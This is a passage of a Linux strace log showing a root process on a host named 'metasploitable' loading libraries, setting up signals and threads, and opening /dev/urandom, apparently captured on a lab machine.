\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512
9930  20:01:21.237460 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0
9930  20:01:21.237478 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df5000
9930  20:01:21.237489 mmap2(0xb7dfe000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dfe000
9930  20:01:21.237504 mmap2(0xb7e00000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e00000
9930  20:01:21.237517 close(1)          = 0
9930  20:01:21.237541 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7df4000
9930  20:01:21.237554 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7df48c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
9930  20:01:21.237615 mprotect(0xb7f70000, 4096, PROT_READ) = 0
9930  20:01:21.237653 munmap(0xb7fb8000, 29913) = 0
9930  20:01:21.237668 set_tid_address(0xb7df4908) = 9930
9930  20:01:21.237677 set_robust_list(0xb7df4910, 0xc) = 0
9930  20:01:21.237687 futex(0xbf9dbe70, 0x81 /* FUTEX_??? */, 1) = 0
9930  20:01:21.237702 rt_sigaction(SIGRTMIN, {0xb7f7a2c0, [], SA_SIGINFO}, NULL, 8) = 0
9930  20:01:21.237715 rt_sigaction(SIGRT_1, {0xb7f7a340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0
9930  20:01:21.237728 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
9930  20:01:21.237742 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0
9930  20:01:21.237762 uname({sys="Linux", node="metasploitable", ...}) = 0
9930  20:01:21.237810 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0
9930  20:01:21.237856 brk(0)            = 0x8153000
9930  20:01:21.237866 brk(0x8174000)    = 0x8174000
9930  20:01:21.237911 getuid32()        = 0
9930  20:01:21.237922 geteuid32()       = 0
9930  20:01:21.237931 getgid32()        = 0
9930  20:01:21.237940 getegid32()       = 0
9930  20:01:21.237979 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dd3000
9930  20:01:21.238007 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1
